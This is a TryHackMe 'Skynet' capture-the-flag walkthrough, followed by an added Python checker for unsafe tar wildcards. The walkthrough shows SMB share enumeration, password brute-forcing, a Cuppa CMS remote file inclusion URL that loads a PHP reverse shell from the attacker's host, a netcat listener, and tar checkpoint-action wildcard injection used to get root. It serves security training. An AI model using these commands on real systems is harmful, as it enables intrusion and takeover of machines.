###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation`

# Skynet

:::info
This room covers the use of GoBuster to enumerate directories and smbclient to find Samba shares.
:::

# Compromise the vulnerable machine

The target is a web server running on port 80.

![](https://i.imgur.com/BijnNIN.png)

## Enumerate the directories

The first thing to do is to enumerate the directories using GoBuster:

```
gobuster dir -u 10.10.164.60 -w /usr/share/wordlists/dirb/common.txt
```

![](https://i.imgur.com/g7PyFYu.png)

The result shows a directory called `squirrelmail`. Let's investigate it. After browsing to the directory, we find a login form:

![](https://i.imgur.com/qUrsXa7.png)

In the tasks, we are told that one of the users is called `Miles`. Assuming Miles is a user, let's try to discover his password.

## Discover Miles' password

Doing the **scan** with **nmap**, I discover that there is a **Samba share** server running. Let's take a look at the different shares by typing `smbclient -L 10.10.164.60`:

![](https://i.imgur.com/NLZlThB.png)

- I notice there is a user called Miles Dyson with the username `milesdyson`.
- There is a weird share called `anonymous`. Let's take a look at it with the command: `smbclient //10.10.164.60/anonymous`

![](https://i.imgur.com/ZzLEmPh.png)

We can see the presence of two files. Let's download them to our local machine with this command: `smbget -R smb://10.10.164.60/anonymous`

![](https://i.imgur.com/FWqjPkp.png)

Let's inspect the different files.

![](https://i.imgur.com/lqPXDoX.png)

The `attention.txt` file shows a message from Miles Dyson. The message suggests that Miles is an IT guy and maybe the admin. Having his password would be very useful. The `log1.txt` file shows us a certain number of words that look like passwords. Let's use this file to test these passwords with **BurpSuite**.

### Testing the log1.txt with BurpSuite

1. I first intercept a login attempt with BurpSuite

![](https://i.imgur.com/CMiPQlq.png)

2. I use the **Intruder** module to try the different passwords. In Intruder, I choose the position where I insert the payloads stored in `log1.txt`. As I want to find the password, I choose to replace the value of `secretkey` with the ones stored in `log1.txt`. I choose `milesdyson` as the user.

![](https://i.imgur.com/9z25Ixh.png)

3. I choose my file for the payload

![](https://i.imgur.com/2cRcNsf.png)

4. I run the attack

![](https://i.imgur.com/aLPY7Sd.png)

The result of the attack lets us know that `cyborg007haloterminator` is the password for the user `milesdyson`. Let's use these credentials to see if I can log into the mail server.

![](https://i.imgur.com/D8GX2cQ.png)

:::success
It works!
:::

### Using Hydra instead of BurpSuite

Instead of using BurpSuite we can also use **hydra**.

![](https://i.imgur.com/K6TvU4d.png)

### Investigate the web mail

After taking a look at the different emails, I find something interesting:

![](https://i.imgur.com/xDB8eME.png)

Indeed, it's Miles' Samba password :smiling_face_with_smiling_eyes_and_hand_covering_mouth:. His Samba share password is: `)s{A&2Z=F^n_E.B`

:::success
We can access his shares.
:::

## Access Miles' shares

We access Miles' share by typing this command: `smbclient -U milesdyson //10.10.164.60/milesdyson`

![](https://i.imgur.com/bQbWwQO.png)

After doing this, we can download all the content of his shares to our local machine: `smbget -U milesdyson -R smb://10.10.164.60/milesdyson`

![](https://i.imgur.com/rLivLbZ.png)

We can see there are some notes left by Miles. After taking a look at them, it sounds like he is implementing a new directory on his server. The name of the directory is: `/45kra24zxs28v3yd`. Let's take a look at it:

:::success
BINGO!
:::

![](https://i.imgur.com/jTxjdH5.png)

There is indeed a web page. As this web page is a "beta" one, it can contain some vulnerabilities. Let's use **Gobuster** again and enumerate the directories.
### Enumerate the hidden directory

![](https://i.imgur.com/dUQlReo.png)

We can notice the presence of an interesting directory. Indeed, it's the **administrator** one.

![](https://i.imgur.com/9rE9MK1.png)

We have a login form running on **Cuppa CMS** (Content Management System). **Cuppa** is an open-source project that seeks to offer a CMS adaptable to any project (news or existing developments, web, desktop or mobile projects) that doesn't have a Content Management System and needs to implement one without going through heavy migration processes or spending hours learning new, complex structures and methodologies.

I then try to see if there are some vulnerabilities associated with Cuppa CMS and I find that there is a **Remote File Inclusion**. Remote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

![](https://i.imgur.com/VLIlpnN.png)

## Exploit the RFI

1. I download the exploit associated with the vulnerability

![](https://i.imgur.com/3rs1HHD.png)

After reading the exploit code, I know how to get a reverse shell. By the way, with the inclusion vulnerability we can also read the output of server files such as `/etc/passwd`.

![](https://i.imgur.com/ofkty5X.png)

2. Create a reverse shell

There is a good PHP reverse shell available on [GitHub](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php).

`wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php`

![](https://i.imgur.com/2qr0Sk1.png)

3. Make the shell available on a server

![](https://i.imgur.com/j8Hwi4A.png)

4. Create a handler

`nc -lvnp 1234`

![](https://i.imgur.com/FkT2Rkw.png)

5. Trigger the reverse shell by exploiting the RFI

Using this link in the browser: `10.10.164.60/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.21.26:4444/php-reverse-shell.php`

:::success
I have a reverse shell
:::

![](https://i.imgur.com/iBSBCPt.png)

## Privilege escalation

I found a directory called **backups** and inside it I found a script called `backup.sh` owned by root.

![](https://i.imgur.com/RNx0lEk.png)

It's a **bash** script that runs the `tar` command inside the `/var/www/html` directory.

![](https://i.imgur.com/YJ6oNfo.png)

I also looked at the `/etc/crontab` file and discovered that the script runs every minute.

![](https://i.imgur.com/xpAZiR4.png)

### Escalate my privileges with tar

After doing a lot of research on the internet, I discovered a technique to escalate my privileges called **Wildcard Injection**.

A **wildcard** is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken. Some wildcard characters:

- `*`: an asterisk matches any number of characters in a filename, including none.
- `?`: the question mark matches any single character.
- ... More details [here](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/)

Since the `tar` command is executed every minute by root, and because of the `*` at the end of the command in the script, we can elevate our privileges as shown in the following figure:

![](https://i.imgur.com/byz50D5.png)

1. I go to the `/var/www/html` directory
2. I execute the following commands:

```
printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

The first one creates a script that adds the SUID bit to **/bin/bash**, which then lets us become root with the `bash -p` command.
The second one creates the file that makes `tar` execute `shell.sh`. There is a `--checkpoint-action` option that specifies the program to be executed when a checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence the options `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh` are handed to the `tar` program as command-line options when the shell expands the `*` into the file names.

We can see with the last `ls -al /bin/bash` command that the SUID bit is set. Then just a `/bin/bash -p` makes us **root**.

:::success
I ELEVATE MY PRIVILEGES AS ROOT
:::
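From the defender's side, the same wildcard-injection mechanism can be audited for: a cron script that hands `tar` a bare `*` is the root cause, and file names beginning with `-` in the web root are the artefacts it leaves. The following Python helpers are an added example, not part of this write-up; the sample script and the temporary directory are constructed here, and the room's real `backup.sh` is not reproduced.

```python
import os
import re
import shlex
import tempfile
from typing import List

def risky_tar_lines(script_text: str) -> List[int]:
    """1-based lines where tar gets a bare, unquoted glob with no '--' before it,
    so a file named like '--checkpoint=1' would be parsed as a tar option."""
    risky = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        # Split on ; & | so "cd dir; tar cf x *" is inspected command by command.
        for segment in re.split(r"[;&|]+", line):
            try:  # posix=False keeps quotes, so a quoted '*' is not flagged
                tokens = shlex.split(segment, comments=True, posix=False)
            except ValueError:
                continue  # unbalanced quotes: skip this segment
            if not tokens or os.path.basename(tokens[0]) != "tar":
                continue
            guarded = False
            for tok in tokens[1:]:
                if tok == "--":
                    guarded = True  # everything after '--' is a file name
                elif tok[0] in "*?[" and not guarded:
                    risky.append(lineno)  # glob with no path prefix can expand to -foo
                    break
    return risky

def option_like_entries(directory: str) -> List[str]:
    """Names in `directory` that start with '-': the artefacts this attack leaves."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))

def hardened_tar_command(src_dir: str, archive: str) -> str:
    """Safe form of the backup: archive '.' relative to src_dir, so nothing is globbed."""
    return f"tar -cf {shlex.quote(archive)} -C {shlex.quote(src_dir)} ."

# Constructed sample script (the room's real backup.sh is not reproduced here).
SAMPLE_SCRIPT = """#!/bin/bash
cd /var/www/html
tar cf /tmp/backup.tgz *
tar -cf /tmp/safe.tgz -C /var/www/html .
tar -cf /tmp/also_safe.tgz -- *
"""

def demo() -> List[str]:
    # Constructed web root holding the two planted names from the write-up.
    with tempfile.TemporaryDirectory() as d:
        for name in ("index.php", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
            open(os.path.join(d, name), "w").close()
        return option_like_entries(d)
```

Only line 3 of the sample is flagged: line 4 never expands a glob and line 5 places the glob after `--`, so tar treats the expanded names as files rather than options.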